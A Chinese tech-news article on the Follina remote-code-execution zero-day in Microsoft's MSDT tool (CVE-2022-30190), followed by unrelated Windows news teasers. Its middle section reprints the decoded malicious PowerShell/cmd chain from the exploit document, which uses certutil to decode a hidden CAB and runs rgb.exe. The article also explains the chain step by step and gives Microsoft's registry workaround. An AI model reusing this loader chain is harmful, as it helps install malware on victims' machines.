首页 > 业界 > 关键词  > base64最新资讯  > 正文

专家发现高危代码执行零日漏洞 所有支持Windows版本均受影响

2022-06-01 08:38 · 稿源: cnbeta

安全专家近日发现了高危的代码执行零日漏洞,目前所有支持的 Windows 系统均受影响。已经有相关证据表明至少在 7 周前就有黑客利用该漏洞,在不触发 Windows Defender 以及其他终端保护产品的情况下,在受害者设备上安装恶意程序。

Shadow Chaser Group 的研究人员在 Twitter 上表示,这个存在于 Microsoft Support Diagnostic Tool 中的漏洞已经于 4 月 12 日报告给微软,并已经证明该漏洞已经被黑客利用进行攻击。

不过给该研究人员的回复中,微软安全响应中心团队并未将报告的行为视为安全漏洞,因为据推测,MSDT 诊断工具在执行有效负载之前需要密码。

不过本周一,微软改变了口风,将该漏洞标识为 CVE-2022-30190,并将其描述为“关键”(critical)漏洞。

在公告中写道:“当从 Word 等调用应用程序使用 URL 协议调用 MSDT 时,存在远程代码执行漏洞。成功利用此漏洞的攻击者可以使用调用应用程序的权限运行任意代码。然后攻击者可以安装程序、查看、更改或删除数据,或者在用户权限允许的上下文中创建新帐户”。

在本文发表时,微软尚未发布补丁。相反,它建议客户通过以下方式禁用 MSDT URL 协议:

1. 以管理员身份运行命令提示符。

2. 要备份注册表项,请执行命令“reg export HKEY_CLASSES_ROOTms-msdt filename”

3. 执行命令“reg delete HKEY_CLASSES_ROOTms-msdt /f”

虽然最初被微软遗漏了,但当研究人员发现周五上传到 VirusTotal 的 Word 文档利用了以前未知的攻击媒介时,该漏洞再次被发现。

根据研究员 Kevin Beaumont 的分析,该文档使用 Word 从远程 Web 服务器检索 HTML 文件。然后,该文档使用 MSProtocol URI 方案来加载和执行 PowerShell 命令。

虽然在理论上这不太可能实现,但事实上确实是可以的。当文档中的命令被解码时,它们会转换为:

$cmd ="c:Windowssystem32cmd.exe";

Start-Process $cmd -windowstyle hidden -ArgumentList"/c taskkill /f /im msdt.exe";

Start-Process $cmd -windowstyle hidden -ArgumentList"/c cd C:userspublicfor /r

%temp% %i in (05-2022-0438.rar) do copy %i 1.rar /yfindstr TVNDRgAAAA 1.rar1.tcertutil -decode 1.t 1.c expand 1.c -F:* .rgb.exe";

根据 Huntress 的解释,该脚本实现的操作为

在隐藏窗口运行以下操作

1. 如果 msdt.exe 正在运行,则终止它

2. 循环遍历 RAR 文件中的文件,查找编码 CAB 文件的 Base64 字符串

3. 将此 Base64 编码的 CAB 文件存储为 1.t

4. 解码Base64编码的CAB文件保存为1.c

5. 将1.c CAB文件展开到当前目录,最后:

6. 执行rgb.exe(大概压缩在1.c CAB文件里面)

举报

  • 相关推荐
  • Windows 11设置更新:将迎来“级”选项页面

    快科技5月2日消息,Windows 11即将迎来一项更新,其设置应用将新增一个高级”选项页面,不过其中的功能并非完全全新,而是对现有开发者”部分的重新设计和功能扩展。微软意识到这些高级功能不仅对开发者有用,普通用户也可能需要,因此将其更名为高级”,以更好地反映其适用范围。除了名称的改变,高级”页面还进行了界面优化,并新增了许多实用功能,微软此前停用了Dev Home应用,并承诺将部分功能整合到操作系统中。高级”页面的新功能包括:切换目录中的长路径、虚拟工作区设置、文件资源管理器源代码集成等。此外,微软还对功能进行了

  • 微软官宣Windows 11硬件驱动两大变化!

    快科技5月7日消息,微软日前宣布了Windows硬件驱动开发的两项重大变化,包括弃用Windows设备元数据等。微软表示,将停用Windows设备元数据(Device Metadata)和Windows元数据及互联网服务(WMIS)。设备元数据即原始设备制造商提供的关于硬件设备信息的集合,该功能在Windows 7中引入,可以包含图标、描述性文本等内容,帮助Windows在任务管理器或设备管理器等位置显示有关此类设备

  • 彻底告别Windows!华为鸿蒙PC版本月发布:自主可控、统一生态

    快科技5月1日消息,在3月份的华为Pura X发布会上,华为常务董事、终端BG董事长、智能汽车解决方案BU董事长余承东宣布,华为终端全面进入鸿蒙时代,今年5月将推出鸿蒙电脑。随着五一假期开启,也揭开了5月的序幕,鸿蒙PC版也越来越近,预计最快会在假期结束后正式官宣发布会时间。其实鸿蒙PC版的推出也是被逼上梁山”,因为微软对华为的Windows系统授权即将到期,华为将无法再继续使用Windows。华为近期就已经推出了Linux笔记本,出厂只有Linux系统,配置不变,比Windows版本便宜300元。后续华为PC将全面转向鸿蒙系统,完全自主可控,老款?

  • Windows XP蓝天白云经典壁纸拍摄者:后悔未索要税!

    美国微软WindowsXP系统那一张标志性的蓝天白云绿草壁纸《幸福》,堪称经典,被誉为史上最多人浏览的照片”。这张壁纸的拍摄者是前《国家地理》摄影师查尔斯奥里尔。这张照片并没有经过任何后期处理,完全是富士胶卷的色彩与相机镜头卓越表现力的完美结合,才成就了如今这般令人惊艳的画面。

  • 努比亚平板 Pro宣布支持Windows PC无线互联 手机文件秒传

    努比亚首款平板Pro将于4月28日发布,搭载第三代骁龙8芯片,配备2.8K 144Hz高刷屏和10100mAh电池+66W快充。支持与Windows PC无线互联、红魔手机秒传文件及自适应投屏。内置AI助手提供修图、文档生成等功能,采用一体金属机身设计,提供锖空黑和极光银两种配色。同期还将发布努比亚Z70S Ultra摄影师版手机。

  • 还坚守Windows吗!鸿蒙PC进度曝光:华为基本解决办公 生态还欠缺

    快科技5月2日消息,正如之前余承东预告的那样,鸿蒙PC将在5月亮相,最快可能是5月8日。对于华为来说,推出鸿蒙PC不单单是因为Windows不会授权了,更多的是要建立起全鸿蒙生态。鸿蒙操作系统的全栈自研架构打破了国产系统基于Linux二次开发”的局限,其分布式软总线技术可实现手机、平板、PC的无缝协同,而这也是华为想要真正实现的鸿蒙大生态。国产替代政策为鸿蒙PC打开了行业市场的大门,但若要走进普通消费者家中,鸿蒙PC必须回答两个关键问题:我常用的软件有没有适配?”和使用起来是否便捷?”据一些博主的爆料,鸿蒙PC目前已经基本?

  • 安装Windows 11四月更新后:C盘无故出现神秘文件夹

    微软日前发布了Windows11的KB5055523累积更新,主要修复漏洞并提升系统性能。不过许多用户在安装该更新后,却发现系统C盘根目录下出现了一个名为inetpub”的空文件夹。在实际测试中,删除该文件夹并未对系统的使用造成任何问题,因此这很可能是微软无意中制造的一个小Bug。

  • “优良传统”没有丢!微软确认4月更新致Windows Hello失效

    微软在4月8日发布了Windows11KB5055523累积更新,没有忘记附赠新Bug的优良传统”,导致部分用户无法通过WindowsHello进行登录。微软官方确认,安装KB5055523更新后,部分启用了SystemGuardSecureLaunch或DynamicRootofTrustforMeasurement功能的设备,可能会遇到WindowsHello登录障碍。对于面部识别,用户需要进入设置-账户-登录选项-面部识别”,点击设置”并按照屏幕指示重新注册;对于PIN码登录,用户可以在登录界面按照提示重新设置PIN。

  • 文创公司推Windows 95经典“画图”挂镜:卖到2880元不便宜

    快科技4月18日消息,微软Windows系统中的画图”软件是许多用户的美好回忆,尤其是其在Windows 95到Windows XP期间的经典界面。如今,一家文创公司Drought将这一经典界面制作成了一面墙挂镜,售价高达395美元,约合人民币2880元。Drought是一家以街头风格为特色的文创品牌,过去曾推出过多种复古风格的商品,如巨大的iPod Nano落地镜和战斗陀螺皮带等。此次,他们推出的画图”镜子�

  • Windows留不住自家人:微软产品经理使用一小时火速换回macOS

    快科技4月29日消息,近日,微软产品经理梅里尔费尔南多(Merill Fernando)在社交媒体上发帖调侃称,被迫使用Windows一个小时后重回macOS,就像离开地球后安全返回地面一样安全。他还配上了凯蒂佩里(Katy Perry)太空旅行后亲吻地面的照片,目前帖子浏览量已超过70.7万次,收获至少1.1万个点赞。Fernando还开玩笑称,如果史蒂夫鲍尔默(Steve Ballmer)还在任,他可能因这样的言论被开除,但如今微软早已改变了过去对Mac的排斥文化,如今员工使用Mac已不再被视为异端。他提到,自己所使用的MacBook正是微软发放的工作设备,此外他还拥有?